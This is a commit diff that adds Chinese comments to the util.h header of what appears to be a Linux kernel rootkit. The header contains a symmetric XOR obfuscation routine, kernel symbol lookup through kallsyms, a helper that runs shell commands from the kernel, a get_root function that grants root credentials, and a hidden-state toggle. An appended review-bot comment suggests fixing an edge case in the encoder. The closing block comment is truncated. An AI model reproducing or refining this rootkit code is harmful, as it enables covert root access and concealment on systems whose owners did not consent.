注释util.h

shou_gan_mian 2 months ago
parent 33a515b746
commit 372f2f875e

@ -3,87 +3,106 @@
#include <linux/cred.h> #include <linux/cred.h>
#if LINUX_VERSION_CODE < KERNEL_VERSION(4, 14, 0) #if LINUX_VERSION_CODE < KERNEL_VERSION(4, 14, 0)
# include <linux/kmod.h> # include <linux/kmod.h> // 低于 4.14 的内核引入 kmod.h
#else #else
# include <linux/umh.h> # include <linux/umh.h> // 高于 4.14 的内核引入 umh.h
#endif #endif
#define do_encrypt(ptr, len, key) do_encode(ptr, len, key) // 定义加密和解密宏,调用相同的编码函数
#define do_decrypt(ptr, len, key) do_encode(ptr, len, key) #define do_encrypt(ptr, len, key) do_encode(ptr, len, key)
#define do_decrypt(ptr, len, key) do_encode(ptr, len, key)
// 循环左移操作
static inline unsigned int custom_rol32(unsigned int val, int n) static inline unsigned int custom_rol32(unsigned int val, int n)
{ {
return ((val << n) | (val >> (32 - n))); return ((val << n) | (val >> (32 - n))); // 将 val 左移 n 位,移出部分放到右边
} }
// 编码函数,可能用于加密或其他数据隐藏
static inline void do_encode(void *ptr, unsigned int len, unsigned int key) static inline void do_encode(void *ptr, unsigned int len, unsigned int key)
{ {
while (len > sizeof(key)) { while (len > sizeof(key)) {
*(unsigned int *)ptr ^= custom_rol32(key ^ len, (len % 13)); *(unsigned int *)ptr ^= custom_rol32(key ^ len, (len % 13)); // 使用异或和循环左移对数据进行编码
len -= sizeof(key), ptr += sizeof(key); len -= sizeof(key);
} ptr += sizeof(key);
}
} }
// 执行用户模式程序,返回执行结果
static inline int exec(char **argv) static inline int exec(char **argv)
{ {
char *envp[] = {"PATH=/sbin:/bin:/usr/sbin:/usr/bin", NULL}; char *envp[] = {"PATH=/sbin:/bin:/usr/sbin:/usr/bin", NULL};
return call_usermodehelper(argv[0], argv, envp, UMH_WAIT_EXEC); return call_usermodehelper(argv[0], argv, envp, UMH_WAIT_EXEC); // 执行外部程序并等待完成
} }
// 执行指定的 shell 命令
static inline int run_cmd(char *cmd) static inline int run_cmd(char *cmd)
{ {
char *argv[] = {"/bin/bash", "-c", cmd, NULL}; char *argv[] = {"/bin/bash", "-c", cmd, NULL};
return exec(argv); return exec(argv); // 调用 exec 函数执行命令
} }
static int ksym_lookup_cb(unsigned long data[], const char *name, void *module, // 内核符号查找回调函数
unsigned long addr) static int ksym_lookup_cb(unsigned long data[], const char *name, void *module, unsigned long addr)
{ {
int i = 0; int i = 0;
while (!module && (((const char *)data[0]))[i] == name[i]) { while (!module && (((const char *)data[0]))[i] == name[i]) {
if (!name[i++]) if (!name[i++]) // 如果找到匹配的符号
return !!(data[1] = addr); return !!(data[1] = addr); // 返回符号地址
} }
return 0; return 0;
} }
// 查找内核符号名对应的地址
static inline unsigned long ksym_lookup_name(const char *name) static inline unsigned long ksym_lookup_name(const char *name)
{ {
unsigned long data[2] = {(unsigned long)name, 0}; unsigned long data[2] = {(unsigned long)name, 0};
kallsyms_on_each_symbol((void *)ksym_lookup_cb, data); kallsyms_on_each_symbol((void *)ksym_lookup_cb, data); // 遍历内核符号查找
return data[1]; return data[1]; // 返回符号地址
} }
#ifdef CONFIG_GIVE_ROOT #ifdef CONFIG_GIVE_ROOT
// 提升当前进程权限为 root
static inline void get_root(void) static inline void get_root(void)
{ {
#if LINUX_VERSION_CODE < KERNEL_VERSION(2, 6, 29) #if LINUX_VERSION_CODE < KERNEL_VERSION(2, 6, 29)
current->uid = 0; // 低版本内核(<2.6.29)直接设置进程的 UID/GID 等为 root 权限
current->suid = 0; current->uid = 0;
current->euid = 0; current->suid = 0;
current->gid = 0; current->euid = 0;
current->egid = 0; current->gid = 0;
current->fsuid = 0; current->egid = 0;
current->fsgid = 0; current->fsuid = 0;
cap_set_full(current->cap_effective); current->fsgid = 0;
cap_set_full(current->cap_inheritable); cap_set_full(current->cap_effective); // 设置所有权限
cap_set_full(current->cap_permitted); cap_set_full(current->cap_inheritable);
cap_set_full(current->cap_permitted);
#else #else
commit_creds(prepare_kernel_cred(0)); // 新版本内核通过 commit_creds 和 prepare_kernel_cred 来获取 root 权限
commit_creds(prepare_kernel_cred(0)); // 提升权限为 root
#endif #endif
} }
#endif #endif
extern int hidden; extern int hidden; // 外部声明的变量 hidden用于标记隐藏状态
// 切换 hidden 标志的值
static inline void flip_hidden_flag(void) static inline void flip_hidden_flag(void)
{ {
if (hidden) if (hidden)
hidden = 0; hidden = 0; // 如果当前是 1设置为 0
else else
hidden = 1; hidden = 1; // 如果当前是 0设置为 1
} }
// 声明的其他函数
int util_init(void); int util_init(void);
int get_cmdline(struct task_struct *task, char *buffer, int buflen); int get_cmdline(struct task_struct *task, char *buffer, int buflen);
//int run_cmd(const char *cmd); //int run_cmd(const char *cmd);
/*加密/解密处理:通过 do_encode 函数对数据进行处理。
使 ksym_lookup_name
get_root root
exec run_cmd shell
flip_hidden_flag hidden
*/
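Review bot: `custom_rol32` is undefined behavior when `n == 0`, because `val >> (32 - n)` then shifts a 32-bit value by its full width, and `do_encode` reaches that case whenever `len % 13 == 0`; the new comment on that line documents the rotate but not this edge, so the function should guard it, e.g. `return n ? ((val << n) | (val >> (32 - n))) : val;`. The comment added above `do_encode` ("可能用于加密或其他数据隐藏") hedges about the function's own purpose; it is more useful to state what the loop visibly does — XOR each 4-byte word with a key/length-derived rotated value, which is symmetric and is why both `do_encrypt` and `do_decrypt` map to it — and to note that the `len > sizeof(key)` condition leaves the final 1–4 bytes untouched, so callers should not assume the whole buffer is transformed. The block comment appended at the end of the hunk is truncated (the `ksym_lookup_name`, `get_root`, `exec`/`run_cmd` and `flip_hidden_flag` entries lose their predicates), so it should be completed or dropped rather than committed half-written.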
